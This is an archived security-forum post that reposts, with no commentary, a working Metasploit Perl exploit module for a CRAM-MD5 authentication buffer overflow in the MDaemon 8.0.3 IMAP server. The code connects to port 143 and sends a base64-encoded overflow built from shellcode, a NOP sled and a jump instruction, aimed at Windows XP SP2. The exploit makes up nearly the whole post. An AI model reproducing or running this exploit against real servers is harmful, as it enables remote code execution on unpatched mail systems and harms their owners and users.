Mdaemon 8.0.3 Imapd Cram-md5 Authentication

Articles Metasploit Framework Windows Tutorial Remote Desktop Connection Windows Processes That May Be Dangerous How-To use NetCat a Tutorial Common Linux Commands Common Ports Netcat Commands HTTP Response Codes War-Google Hack Terms Wardriving Avoiding Social Engineering and Phishing Attacks Intrusion Detection on Linux Linux Intrusion Detection Penetration Testing Guide Penetration Testing Tools Social Engineering Fundamentals, Part I: Hacker Tactics Social engineering (computer security) The Psychology of Social Engineering The Archives General GSO GovernmentSecurity.org News & Suggestions In The News Open Topic General Security Information Trash Can Exploit & Vulnerability Mailing List Archives Trial Member Forum Product and Program Reviews GSO Tutorials System Security Windows Systems Beginners Section Linux & Unix Systems File Downloads Exploit Research & Discussion Trojan & Virus Errata Networking Security / Firewall / IDS / VPN / Routers System Hardening E-Mail Security Wifi Security Trial Member Uploads Upload discovered Trojans & Mal ware GSO Programming Section C , C++ , VC++ Visual Basic .NET Perl /CGI Java/Javascript PHP/XML/ASP/HTML Assembly + Other The Cork Board Network Security Consultant Directory Network Security Jobs The Archives Encryption Information General Network Security Internet Anonymity HTTP Protocol Security Linux Security MS IIS Information Exploit Articles Programming / Tool Design GSO Software Projects Public Downloads Microsoft Security Questions and Papers		Help - Search - Member List - Calendar Full Version: Mdaemon 8.0.3 Imapd Cram-md5 Authentication GovernmentSecurity.org > General GSO > Exploit & Vulnerability Mailing List Archives qcred11 Aug 12 2005, 11:10 PM QUOTE Mdaemon 8.0.3 IMAPD CRAM-MD5 Authentication Overflow CODE # # package Msf::Exploit::mdaemon_imap; use strict; use base 'Msf::Exploit'; use Msf::Socket::Tcp; use Pex::Text; my $advanced = { }; my $info = { 'Name' => 'Mdaemon 8.0.3 IMAD CRAM-MD5 Authentication Overflow', 'Version' => '$Revision: 1.1 $', 'Authors' => [ 'anonymous', ], 'Arch' => [ 'x86' ], 'OS' => [ 'win32'], 'Priv' => 1, 'AutoOpts' => { 'EXITFUNC' => 'process', }, 'UserOpts' => { 'RHOST' => [1, 'ADDR', 'The target address'], 'RPORT' => [1, 'PORT', 'The target port', 143], }, 'Payload' => { 'Prepend' => "\x81\xc4\x1f\xff\xff\xff\x44", # make stack happy 'Space' => 500, 'BadChars' => "\x00", }, 'Description' => Pex::Text::Freeform(qq{ This module exploits a buffer overflow in the CRAM-MD5 authentication of the MDaemon IMAP service. }), 'Refs' => [ ['OSVDB', 11838], ['BID', 11675], ], 'Targets' => [ ['MDaemon IMAP 8.0.3 Windows XP SP2'], ], 'Keys' => ['mdaemon'], }; sub new { my $class = shift; my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_); return($self); } sub Exploit { my $self = shift; my $targetHost = $self->GetVar('RHOST'); my $targetPort = $self->GetVar('RPORT'); my $targetIndex = $self->GetVar('TARGET'); my $encodedPayload = $self->GetVar('EncodedPayload'); my $shellcode = $encodedPayload->Payload; my $target = $self->Targets->[$targetIndex]; my $sock = Msf::Socket::Tcp->new( 'PeerAddr' => $targetHost, 'PeerPort' => $targetPort, ); if($sock->IsError) { $self->PrintLine('Error creating socket: ' . $sock->GetError); return; } my $resp = $sock->Recv(-1); chomp($resp); $self->PrintLine('[] Got Banner: ' . $resp); my $req = "a001 authenticate cram-md5\r\n"; $sock->Send($req); $self->PrintLine('[] CRAM-MD5 authentication method asked'); $resp = $sock->Recv(-1); chomp($resp); $self->PrintLine('[] Got CRAM-MD5 answer: ' . $resp); $req = "AAAA" . $shellcode . ("\x90" x 258) . "\xe9\x05\xfd\xff\xff"; $req = Pex::Text::Base64Encode($req, '') . "\r\n"; $sock->Send($req); $self->PrintLine('[] CRAM-MD5 authentication with shellcode sent'); $resp = $sock->Recv(-1); chomp($resp); $self->PrintLine('[] Got authentication reply: ' . $resp); $req = "a002 LOGOUT\r\n"; $sock->Send($req); $self->PrintLine('[] Send LOGOUT to close the thread and trigger an exception'); $resp = $sock->Recv(-1); chomp($resp); $self->PrintLine('[] Got LOGOUT reply: ' . $resp); $self->PrintLine("[] Overflow request sent, sleeping for one second"); select(undef, undef, undef, 1); $self->Handler($sock); return; } 1; Source: http://www.milw0rm.com/id.php?id=1151 This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here. Invision Power Board © 2001-2005 Invision Power Services, Inc.